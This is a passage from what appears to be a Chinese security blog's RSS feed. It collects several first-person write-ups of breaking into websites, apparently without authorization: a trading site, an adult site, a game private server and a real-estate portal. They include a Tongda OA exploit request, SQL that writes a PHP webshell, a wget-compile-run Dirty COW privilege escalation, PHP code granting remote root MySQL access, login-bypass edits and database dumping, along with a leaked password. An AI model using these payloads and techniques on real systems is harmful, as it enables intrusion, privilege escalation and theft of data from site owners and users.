Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xx.xx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114
Connection: close

USERNAME=admin&amp;PASSWORD=&amp;MYOA_MASTER_DB[id]=1&amp;MYOA_MASTER_DB[host]=123.123.123.123&amp;MYOA_MASTER_DB[user]=root&amp;MYOA_MASTER_DB[pwd]=rootpassword&amp;MYOA_MASTER_DB[db]=oa&amp;encode_type=1&amp;button=
</pre>
<p>其中的MySQL数据库链接配置需要自己搭建外网MySQL，并且开通root外链。</p>
<p><a href="https://pan.chabug.org/%E4%B8%8B%E8%BD%BD/TD_OA.zip">TD_OA.sql</a> 下载导入</p>
<p>&nbsp;</p>
<h1>getshell</h1>
<p>后台有 sql 导入功能, 有两种方法, 使用 <code>into outfile</code> 或者用 <code>general_log</code></p>
<pre class="lang:default decode:true ">update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;</pre>
<pre class="lang:default decode:true">set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '&lt;?php assert($_POST[a]) ?&gt;';
set global general_log = off;</pre>
<p>&nbsp;</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>渗透某智能交易网</title>
		<link>/web/360.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 23 Feb 2018 12:27:23 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[解析漏洞]]></category>
		<guid isPermaLink="false">/?p=249</guid>

					<description><![CDATA[原文xz：https://exp10it.cn/index.php/archives/948/ 有删减 下午看见 chabug 群里直播日站 这个站点好像一直没搞下想着主站应该什么...]]></description>
										<content:encoded><![CDATA[<blockquote><p>原文xz：<a href="https://exp10it.cn/index.php/archives/948/">https://exp10it.cn/index.php/archives/948/</a>  有删减</p></blockquote>
<p>下午看见 chabug 群里直播日站 这个站点好像一直没搞下<br />想着主站应该什么思路都试过了，那我们就看看旁站<br /><img src="/wp-content/uploads/2018/02/4013565014.jpg" alt="1519211706.jpg" title="1519211706.jpg"></p>
<p>搞下后发现并不能跨目录</p>
<p>回到主站</p>
<p>后台<br /><img src="/wp-content/uploads/2018/02/870924896.jpg" alt="1519211774.jpg" title="1519211774.jpg"><br />主站<span class="wpcom_tag_link"><a href="/tags/%e6%b3%a8%e5%85%a5" title="注入" target="_blank">注入</a></span><br /><img src="/wp-content/uploads/2018/02/3464910292.jpg" alt="1519211913.jpg" title="1519211913.jpg"><br />有过滤<br /><img src="/wp-content/uploads/2018/02/292031456.jpg" alt="1519211923.jpg" title="1519211923.jpg"><br />大小写绕过<br /><img src="/wp-content/uploads/2018/02/2077749061.jpg" alt="1519211931.jpg" title="1519211931.jpg"><br />sqlmap没 dump 出来</p>
<p>估计很多人到这里就放弃了&#8230;</p>
<p>自己写个小脚本跑内容</p>
<p>原理就是手工注入<br /><img src="/wp-content/uploads/2018/02/643884795.jpg" alt="1519211988.jpg" title="1519211988.jpg"><br /><img src="/wp-content/uploads/2018/02/4112437221.jpg" alt="1519212013.jpg" title="1519212013.jpg"><br />后台只有 fckeditor 还是 1.0 的 果断放弃</p>
<p>于是扫目录<br /><img src="/wp-content/uploads/2018/02/4073097413.jpg" alt="1519212185.jpg" title="1519212185.jpg"><br />filepath 截断<br /><img src="/wp-content/uploads/2018/02/186080850.jpg" alt="1519212229.jpg" title="1519212229.jpg"><br />访问 404</p>
<p>a.asp; 这样也不行 服务器是 iis7 的</p>
<p>想到旁站里有 php 的站点 试试<span class="wpcom_tag_link"><a href="/tags/%e8%a7%a3%e6%9e%90%e6%bc%8f%e6%b4%9e" title="解析漏洞" target="_blank">解析漏洞</a></span><br /><img src="/wp-content/uploads/2018/02/2721861022.jpg" alt="1519212280.jpg" title="1519212280.jpg"><br /><img src="/wp-content/uploads/2018/02/3427780922.jpg" alt="1519212287.jpg" title="1519212287.jpg"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>莫名其妙的后台拿shell加上Linux提权</title>
		<link>/web/352.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 11 Feb 2018 06:50:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[脏牛]]></category>
		<guid isPermaLink="false">/?p=189</guid>

					<description><![CDATA[当我还在被窝的时候，我们的@X1r0z大佬就已经在日站了。。 或许这就是大佬吧。 大佬召唤，我不得不起床。进入后台，寻找上传点，卧槽，发现FCK编辑器哎我们的XZ大佬现在连FCK编...]]></description>
										<content:encoded><![CDATA[<p>当我还在被窝的时候，我们的<a href="https://exp10it.cn/">@X1r0z大佬</a>就已经在日站了。。</p>
<p><img src="/wp-content/uploads/2018/02/433466645.png" alt="1.png" title="1.png"><br />或许这就是大佬吧。</p>
<p>大佬召唤，我不得不起床。<br />进入后台，寻找上传点，卧槽，发现FCK编辑器哎<br /><img src="/wp-content/uploads/2018/02/2345141013.png" alt="2.png" title="2.png"><br />我们的XZ大佬现在连FCK编辑器都拿不下来了吗？那就到我装逼的时候了！<br />然后GG，点击上传图片竟然。。<br /><img src="/wp-content/uploads/2018/02/2718947025.png" alt="5.png" title="5.png"></p>
<p>怪不得，大佬可是给我扔了个黑锅啊。不过还好，旁边还有一个<code>小文件上传</code>，是个上传点。<br /><img src="/wp-content/uploads/2018/02/2580867573.png" alt="3.png" title="3.png"><br />可是看到这个布局我突然有一种不详的预感。管他呢，burp一顿怼之后，草草放弃了。<br />因为不管怎么改文件名怎么截断都不解析啊。算了，再翻翻其他的。<br /><img src="/wp-content/uploads/2018/02/2360087802.png" alt="4.png" title="4.png"><br />这个语言包管理直觉是能够利用，不过可能还要百度源代码审计，想想放弃了，毕竟人家还是小白呢。</p>
<p>继续翻，我就不信了，发现又一个上传点！<br /><img src="/wp-content/uploads/2018/02/2933152389.png" alt="6.png" title="6.png"><br />好熟悉啊，和刚才发布文章的页面一毛一样！竟然在这有上传点。</p>
<p>那就开怼把！点击<code>插入图片</code>之后是这个样子<br /><img src="/wp-content/uploads/2018/02/270342418.png" alt="7.png" title="7.png"><br />很草率啊，不知道能不能上传。先上传一张正常的试试<br /><img src="/wp-content/uploads/2018/02/4069183061.png" alt="8.png" title="8.png"><br />竟然ok？！那就再试试直接传php后缀的<br /><img src="/wp-content/uploads/2018/02/3078760086.png" alt="9.png" title="9.png"><br />也上传成功了，但是没有返回路径？？？不急，我记得有一个文件管理。<br /><img src="/wp-content/uploads/2018/02/3185685965.png" alt="10.png" title="10.png"><br />果然ojbk了。<br /><img src="/wp-content/uploads/2018/02/1388588561.png" alt="11.png" title="11.png"><br />有没有很佩服我优秀的打码呢？<br />虚拟终端</p>
<pre><code>[*] 基本信息 [     Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64(xxx) ]
[/wwwroot/upfiles/201802/11/]$ whoami
damachuli
[/wwwroot/upfiles/201802/11/]$ uname -a
Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
</code></pre>
<p>竟然是<span class="wpcom_tag_link"><a href="/tags/linux" title="Linux" target="_blank">Linux</a></span>机器，2012年的，我们可以试试<span class="wpcom_tag_link"><a href="/tags/%e8%84%8f%e7%89%9b" title="脏牛" target="_blank">脏牛</a></span><a href="/archives/48.html">详情看这里</a></p>
<pre><code>下载
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
编译
gcc -pthread dirty.c -o dirty -lcrypt
运行
./dirty 123456</code></pre>
<p>然后尝试链接提示</p>
<pre><code>fuzz@DESKTOP-JJAMRAA:~$ ssh root@114.80.xxx.xxx
ssh: connect to host 114.80.xxx.xxx port 22: Connection refused</code></pre>
<p><code>netstat -ntpl</code>查看端口<br /><img src="/wp-content/uploads/2018/02/535194959.png" alt="13.png" title="13.png"><br />尝试后发现是55022<br />链接<br /><img src="/wp-content/uploads/2018/02/3956331579.png" alt="13.png" title="13.png"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>日一个毛片网站</title>
		<link>/web/351.html</link>
					<comments>/web/351.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 08 Feb 2018 23:40:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=164</guid>

					<description><![CDATA[原文地址 一开始是奔着dz去的，注册了个账号，想试一下任意文件删除然后重装getshell，当然。。。失败了。。最新版dz。 然后有个老铁说有个旁站，是一个发卡平台，抄出我的goo...]]></description>
										<content:encoded><![CDATA[<blockquote><p><a href="https://www.luolikong.vip/?p=369">原文地址</a></p></blockquote>
<p>一开始是奔着dz去的，注册了个账号，想试一下任意文件删除然后重装getshell，当然。。。失败了。。最新版dz。</p>
<p>然后有个老铁说有个旁站，是一个发卡平台，抄出我的google大法搜到了别人破解的源码。 然后丢到环境里搭起来晾着。</p>
<p>nmap扫端口扫到了两个开放http的端口一个是88，一个是888.</p>
<p>打开后发现888是宝塔的管理面板。</p>
<p>当时我就装了个宝塔打算巴拉巴拉一波，静态跑一遍之后忽然想起今天要上班还是不看宝塔了，转而去发卡平台源码巴拉巴拉。</p>
<p>上代码审计工具看了下，没有过滤，注入是肯定有的，但是我并不想注入。。。因为。。。我不会mysql。。。</p>
<p>随便贴张图吧<br /><img src="/wp-content/uploads/2018/02/546007818.png" alt="1.png" title="1.png"><br />那么问题来了，注入不搞的话怎么去getshell或者弄管理员密码呢？</p>
<p>全部巴拉巴拉了一遍源码之后发现一个文件没有校验登陆状态。唔。。。没错  那是个ajax.php</p>
<p>只要参数正确就可以传递内容过去。</p>
<p>这是密码修改的后端代码<br /><img src="/wp-content/uploads/2018/02/1575681464.png" alt="2.png" title="2.png"><br />请求大概是这样 <br /><img src="/wp-content/uploads/2018/02/58622513.png" alt="3.png" title="3.png"><br />就这样我们修改成功了。。。。</p>
<p>然后就是怎么get个shell。。。</p>
<p>看了几个功能之后觉得可以试试上传文件。。但是上传绕过太烦。。</p>
<p>代码如下<br /><img src="/wp-content/uploads/2018/02/3729323431.png" alt="4.png" title="4.png"><br />这时看到了一个echo的东西。。。这是个很重要的突破点</p>
<p>代码如下<br /><img src="/wp-content/uploads/2018/02/2048593619.png" alt="5.png" title="5.png"><br />之前我们说过这个程序没有过滤之类的操作，</p>
<p>so。。看一下这个emailconfig.php是长什么样<br /><img src="/wp-content/uploads/2018/02/3242096533.png" alt="6.png" title="6.png"><br />我突然想到了存储型xss，从存储型xss想到了前后代码补全get个shell。。。</p>
<p>先搓一个五毛钱的phpinfo<br /><img src="/wp-content/uploads/2018/02/3248306042.png" alt="7.png" title="7.png"><br />提交之后返回修改邮件的标签可以发现如下情况 <br /><img src="/wp-content/uploads/2018/02/782158639.png" alt="8.png" title="8.png"><br />ojbk再搓一个一块钱的shell <br /><img src="/wp-content/uploads/2018/02/3515638794.png" alt="9.png" title="9.png"><br />然而很不幸的是。。。500错误了。。。在看了一下phpinfo打印的信息发现。。。 <br /><img src="/wp-content/uploads/2018/02/205665682.png" alt="10.png" title="10.png"><br />全都GG了。。</p>
<p>这种情况很尴尬。。。非常的尴尬。。。</p>
<p>欣赏了一会音乐之后想起我为什么不读一下文件试试？毕竟mysql是开放的，于是乎。。。去读了dz的配置文件</p>
<p>还行啦这玩意居然是root账号。。。</p>
<p>当时我就操出我的mysql udf准备扫操作一波。。。但是忽然发现root不能远程登陆。。于是再搓一个远程登陆的查询语句</p>
<pre><code>$link=@mysqli_connect('localhost','root','root');mysqli_select_db($link,'mysql');mysqli_set_charset($link,'utf8');mysqli_query($link,&quot;update user set host = '%'where user= 'root';&quot;);mysqli_query($link,&quot;GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION;&quot;);mysqli_query($link,&quot;flush privileges;&quot;);</code></pre>
<p>大概是这样  ，然后刷新一下php页面就能远程连接了。</p>
<p>这时我还要读一下目录看看plugin文件夹在不在。。。于是又搓了一个读文件夹的代码</p>
<p><code>print_r(glob($_GET['id']. '/*' , GLOB_ONLYDIR));</code><br />唔。。事实证明并没有plugin目录。。。gg。。</p>
<p>这时我又继续听歌。。突然我想起这玩意目录里有个aspnet_client</p>
<p>能不能搓个asp？</p>
<p>于是又搓了一行代码用来创建asp文件</p>
<p><code>file_put_contents('one.asp', '');</code><br />于是。。生成了一个asp的shell。。访问成功 <br /><img src="/wp-content/uploads/2018/02/1481939401.png" alt="11.png" title="11.png"><br />这时。。。开始创建个mysql的plugin目录用于传udf。。。然而折腾了一会之后发现udf加载失败。。。头大。。。放弃这个方案。</p>
<p>这是我们开始打宝塔的主意，</p>
<p>巴拉巴拉找到了宝塔的数据库文件。。是个sqli。。直接打开发现是MD5加密的密码。。。。唔。。。cmd5查不到。。。</p>
<p>突然间我又突发奇想。。。宝塔的网站目录能不能读？</p>
<p>事实证明是可以的。。。<br /><img src="/wp-content/uploads/2018/02/239910051.png" alt="12.png" title="12.png"><br />于是去看了下login.php</p>
<p>唔。。。直接改登陆认证。。。<br /><img src="/wp-content/uploads/2018/02/3122940510.png" alt="13.png" title="13.png"></p>
<p>然后就登陆上了宝塔的面板。。。。</p>
<p>翻了一圈没找到个执行命令的地方   有个计划任务还不执行。。这就很蛋疼。。。</p>
<p>抽了两根烟。。又翻了下宝塔的文件夹。。。突然灵光一现。。这TM宝塔还有个独立的php环境。。。搓开php.ini发现没有过滤。。。。ojbk直接传个php到宝塔面板根目录<br /><img src="/wp-content/uploads/2018/02/4056422949.png" alt="14.png" title="14.png"><br />我们终于从iis_user变成了system。。。</p>
<p>唔。。接下来就简单了。。。创个用户。。远程登陆。。。脱裤脱源码。。。。收工<br /><img src="/wp-content/uploads/2018/02/1622407023.png" alt="15.png" title="15.png"></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/351.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>记一次毫无亮点的私服服务器渗透+提权</title>
		<link>/web/346.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 31 Jan 2018 19:44:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[解析]]></category>
		<guid isPermaLink="false">/?p=127</guid>

					<description><![CDATA[毫无亮点的一次渗透经历这吊毛，什么几把站点都往我这仍！哇！看到这个我就想起了：“大家好，我系渣渣辉。”御剑扫一波,发现上传点。习惯性burp抓包思密达先go一下发现正常上传。标重点...]]></description>
										<content:encoded><![CDATA[<p>毫无亮点的一次<span class="wpcom_tag_link"><a href="/tags/%e6%b8%97%e9%80%8f" title="渗透" target="_blank">渗透</a></span>经历<br /><img src="/wp-content/uploads/2018/01/1054833045.png" alt="1.png" title="1.png"><br />这吊毛，什么几把站点都往我这仍！<br /><img src="/wp-content/uploads/2018/01/572101772.png" alt="2.png" title="2.png"><br />哇！看到这个我就想起了：“大家好，我系渣渣辉。”<br />御剑扫一波,发现上传点。<br /><img src="/wp-content/uploads/2018/01/2578795906.png" alt="3.png" title="3.png"><br />习惯性burp抓包思密达<br /><img src="/wp-content/uploads/2018/01/3590825814.png" alt="4.png" title="4.png"><br />先go一下发现正常上传。标重点，apache2.4的web容器，直接<span class="wpcom_tag_link"><a href="/tags/%e8%a7%a3%e6%9e%90" title="解析" target="_blank">解析</a></span>漏洞改后缀为<code>.PHP</code>上传即可<br /><img src="/wp-content/uploads/2018/01/29498286.png" alt="5.png" title="5.png"><br />完全哦你妈的蛇皮棒棒K<br /><img src="/wp-content/uploads/2018/01/4021494741.png" alt="6.png" title="6.png"><br />菜刀链接<br /><img src="/wp-content/uploads/2018/01/1493658059.png" alt="7.png" title="7.png"><br /><img src="/wp-content/uploads/2018/01/1156966701.png" alt="8.png" title="8.png"><br />wamp搭建的，权限很大。直接<code>net user</code>就行了<br />附张合照<br /><img src="/wp-content/uploads/2018/01/3245780212.png" alt="9.png" title="9.png"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>淫荡思路拿下某房产网</title>
		<link>/web/343.html</link>
					<comments>/web/343.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 28 Jan 2018 14:15:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[思路]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=84</guid>

					<description><![CDATA[目标网站win2003 + iis6 + access + asp 首先扫目录有上传页面 白名单 上传失败 wvs 检测到注入点表没跑出来首页有 用户注册个人中心发布信息 那里上传...]]></description>
										<content:encoded><![CDATA[<p>目标网站<br /><img src="/wp-content/uploads/2018/01/1613194789.jpg" alt="1.jpg" title="1.jpg"><br />win2003 + iis6 + access + asp</p>
<p>首先扫目录<br /><img src="/wp-content/uploads/2018/01/2566360162.jpg" alt="2.jpg" title="2.jpg"><br />有上传页面 白名单 上传失败</p>
<p>wvs 检测到注入点<br /><img src="/wp-content/uploads/2018/01/2931145600.jpg" alt="3.jpg" title="3.jpg"><br />表没跑出来<br /><img src="/wp-content/uploads/2018/01/2241425302.jpg" alt="4.jpg" title="4.jpg"><br />首页有 用户注册<br /><img src="/wp-content/uploads/2018/01/1969680409.jpg" alt="5.jpg" title="5.jpg"><br />个人中心<br /><img src="/wp-content/uploads/2018/01/3688801265.jpg" alt="6.jpg" title="6.jpg"><br />发布信息 那里上传调用的也是 /inc/upload.asp</p>
<p>没啥<span class="wpcom_tag_link"><a href="/tags/%e6%80%9d%e8%b7%af" title="思路" target="_blank">思路</a></span> 于是就检测旁站 扫到 shell<br /><img src="/wp-content/uploads/2018/01/916705836.jpg" alt="7.jpg" title="7.jpg"><br />不灭之魂 右键源代码 font 后面就是密码</p>
<p><img src="/wp-content/uploads/2018/01/3942681093.jpg" alt="8.jpg" title="8.jpg"></p>
<p>?profile=a 爆密码<br /><img src="/wp-content/uploads/2018/01/2184906419.jpg" alt="9.jpg" title="9.jpg"><br />freehost 星外虚拟主机</p>
<p><img src="/wp-content/uploads/2018/01/1828283220.jpg" alt="10.jpg" title="10.jpg"></p>
<p>提权渣&#8230;</p>
<p>Media Index 目录可以执行文件<br /><img src="/wp-content/uploads/2018/01/3307604897.jpg" alt="11.jpg" title="11.jpg"><br />上传 cmd.exe</p>
<p>不过1秒后就被杀软干掉了</p>
<p>因为是星外的主机 支持 php 尝试写一个死循环不断写入二进制文件</p>
<p>文件生成成功 但拒绝访问<br /><img src="/wp-content/uploads/2018/01/1628105615.jpg" alt="12.jpg" title="12.jpg"><br />百度发现星外主机还有一个跨目录漏洞</p>
<p><a href="/archives/113.html">星外虚拟主机跨目录技巧</a><br /><img src="/wp-content/uploads/2018/01/1199028655.jpg" alt="13.jpg" title="13.jpg"><br />目标站是 q 开头的 找到这些可疑路径<br /><img src="/wp-content/uploads/2018/01/1086339470.jpg" alt="14.jpg" title="14.jpg"><br />打包源码 下载 查看数据库</p>
<p><img src="/wp-content/uploads/2018/01/4273026843.jpg" alt="15.jpg" title="15.jpg"></p>
<p>md5 无法解密</p>
<p>仔细看 xinyu 用户</p>
<p>旁站找到一个网站</p>
<p><img src="/wp-content/uploads/2018/01/2730933926.jpg" alt="16.jpg" title="16.jpg"></p>
<p>建站公司 竟然改成房产了&#8230;</p>
<p>想了想 可能是后门账户</p>
<p>于是下载它的源码</p>
<p><img src="/wp-content/uploads/2018/01/2791474558.jpg" alt="17.jpg" title="17.jpg"></p>
<p>翻了一会 发现网站配置文件</p>
<p>邮件服务器的账号密码</p>
<p>目标站</p>
<p><img src="/wp-content/uploads/2018/01/4052985042.jpg" alt="18.jpg" title="18.jpg"></p>
<p>建站公司<br /><img src="/wp-content/uploads/2018/01/76253023.jpg" alt="19.jpg" title="19.jpg"><br /><code>JJJdhy217315</code></p>
<p>somd5<br /><img src="/wp-content/uploads/2018/01/1772607700.jpg" alt="20.jpg" title="20.jpg"><br />和之前解不出来的 md5 一样</p>
<p>直接拿密码登录后台<br /><img src="/wp-content/uploads/2018/01/1425038825.jpg" alt="21.jpg" title="21.jpg"><br />有数据库备份<br /><img src="/wp-content/uploads/2018/01/1206462285.jpg" alt="22.jpg" title="22.jpg"><br />尼玛没权限<br /><img src="/wp-content/uploads/2018/01/491777432.jpg" alt="23.jpg" title="23.jpg"><br />本地继续翻源码 看看有没有其他上传点</p>
<p>翻到 house 目录 发现 dhb1.asp<br /><img src="/wp-content/uploads/2018/01/1271669833.jpg" alt="24.jpg" title="24.jpg"><br />dhb 电话簿</p>
<p>后台<img src="/wp-content/uploads/2018/01/2338526558.jpg" alt="25.jpg" title="25.jpg"></p>
<p>和源码里的一样</p>
<p>插入一句话<br /><img src="/wp-content/uploads/2018/01/3188908232.jpg" alt="26.jpg" title="26.jpg"><br />保存成功</p>
<p>连接<br /><img src="/wp-content/uploads/2018/01/2556453786.jpg" alt="27.jpg" title="27.jpg"></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/343.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
